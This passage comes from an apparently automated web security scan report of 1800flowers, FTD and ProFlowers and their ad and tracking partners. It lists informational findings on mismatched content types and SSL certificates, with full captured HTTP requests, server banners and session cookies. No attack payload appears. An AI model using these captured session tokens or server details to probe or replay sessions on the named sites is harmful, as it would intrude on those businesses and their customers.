Cookie: FSDLK001=pctl=311878&fpt=0%2C311878%2C&pct%5Fdate=4131&FL311878=1&pctm=1&FM34631=1&pctc=34631&FQ=1; FSQTS032=pctl=304931&fpt=0%2C304931%2C&pct%5Fdate=4139&pctm=1&FL304931=1&FM36289=1&pctc=36289&FQ=1; FSESE002=pctc=31430&FQ=2&pctm=2&FM34983=1&FL311033=1&fpt=0%2C311033%2C109226%2C&pct%5Fdate=4143&FL109226=1&pctl=109226&FM31430=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1475
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Mon, 09 May 2011 00:59:32 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title></title></head><body><IMG id="fd_pct_image0" name="fd_pct_image0" src="http://ad.trafficmp.com/a/bpix?adv=1657&id=1&r=
...[SNIP]...
23.3. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/carousel.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media5.1800flowers.com
Path:   /800f_assets/jet/website/images/flowers/carousel.html

Request

GET /800f_assets/jet/website/images/flowers/carousel.html HTTP/1.1
Host: media5.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 05 Jan 2011 18:29:33 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: text/html
Expires: Mon, 09 May 2011 01:00:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 01:00:48 GMT
Connection: close
Content-Length: 6228

<link type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/footer/carousel.css" rel="stylesheet">

<div style="margin:-10px 0 0 0; width:980px;height:90px;
...[SNIP]...
23.4. http://recs.richrelevance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; catvhc=d-eF0-g9tZ-B---%%; pvihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C73.1303848202747.21158348%7C; pendprch=b82.1304903465735.null.59433447%7C82.1304903465735.null.15169998%7C

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.46
Date: Mon, 09 May 2011 12:11:23 GMT
Content-Type: text/html
Content-Length: 571
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.46</center>
</body>
</html>
<!-- a padding to disable MSIE
...[SNIP]...
23.5. http://www.ftd.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
23.6. http://www.ftd.com/empty/index.epl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /empty/index.epl

Request

GET /empty/index.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
Cache-Control: max-age=86400
Content-Type: text/html
Content-Length: 154
Date: Mon, 09 May 2011 01:00:35 GMT
X-Varnish: 729965568 728030311
Age: 32255
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><title>Empty Page</title></head>
<body>
<!-- empty page -->

</body>
</html>
23.7. http://www.ftd.com/empty/tealeaf.epl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /empty/tealeaf.epl

Request

POST /empty/tealeaf.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
Content-Type: text/html
Content-Length: 164
Date: Mon, 09 May 2011 01:03:26 GMT
X-Varnish: 1301379237
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><title>TeaLeaf</title></head>
<body>
<!-- dummy page for tea leaf -->

</body>
</html>
24. Content type incorrectly stated  previous  next
There are 3 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

24.1. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u= HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=cb45f86e-c186-488a-9d0f-aec6be178ed4; evo5=z2r8aytrpwakd%7CMEacUnu%2BdlVAnlb0EJqADUPwdEWLwFVt1YkusdXa%2FyG4PDMmwT%2Bp04eahs%2BgOi%2BCY9F8sJ1N5rP7C5Tcb6%2BH1tPYzqeBSrsgO%2FIVnhaSvpJm5%2FDT0Ajp8kznUSNzkVywo4QxpKsftt8R5jf0pDOjFkH3uJy8CgNSN5gRv3ZgKClRVzaPtdufl67Wm9PuOAAQRJYlAbyAfeEbfybOFvnJNK26bhsFqut4RfCugAAIH9Thyf7tC%2FaFjZR6%2F4Xe3KWE9CjAfOduuB6WLWUvJbSzsEWNZmsH81p0aGPaG8iWRByF0XMlYG51oqOMDXV2iLvcha3GW5DrzVhwxSGnknALfg%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 1213
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != ''){ if(sipageurl.split('/')[2] != sirefurl.split(
...[SNIP]...
24.2. http://sales.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=87011923 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; _mkto_trk=id:220-ESA-932&token:_mch-liveperson.net-1304643823223-44198

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=87011923
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1a98"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 01:07:08 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...
24.3. http://www.res-x.com/ws/r2/Resonance.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.res-x.com
Path:   /ws/r2/Resonance.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ws/r2/Resonance.aspx?appid=provide01&tk=674723556265235&ss=612828374374657&sg=1&pg=852078527677804&bx=false&vr=2.69&ei=&qt=&pr=&tt=&cu=91621bab-4967-45f8-ad8e-98be730e6e4a&tr=&cv2=PFC&cv3=HPC&cv4=27&cv5=&cv6=&cv7=&cv8=&cv9=&cv10=&cv11=&cv12=&cv13=&cv14=&cv15=&cv16=true&cv17=&cv18=&cv19=&cv20=&cv22=&cv23=&cv25=&cv26=&cv27=&cv28=&cv29=&cv30=&cv31=&cv32=&cv33=&cv34=&cv35=&cv36=PFC%3ALanding%3AHome&cv37=&cv38=91621bab-4967-45f8-ad8e-98be730e6e4a&cv39=&cv40=true&cv41=false&ur=http%3A//www.proflowers.com/&plk=&rf= HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=epyn03551ctyeoyvyfqn3nya; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Mon, 09 May 2011 12:08:23 GMT
Set-Cookie: NSC_wjq-qspwjef=ffffffffc3a01e4445525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 10

<!-- //-->
25. SSL certificate  previous
There are 2 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

25.1. https://orders.proflowers.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  orders.proflowers.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Mon Dec 06 18:00:00 CST 2010
Valid to:  Thu Dec 08 17:59:59 CST 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036

Certificate chain #3

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036
25.2. https://ww30.1800flowers.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  ww30.1800flowers.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Thu Dec 02 18:00:00 CST 2010
Valid to:  Sun Dec 02 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
Report generated by XSS.CX at Mon May 09 07:41:14 CDT 2011.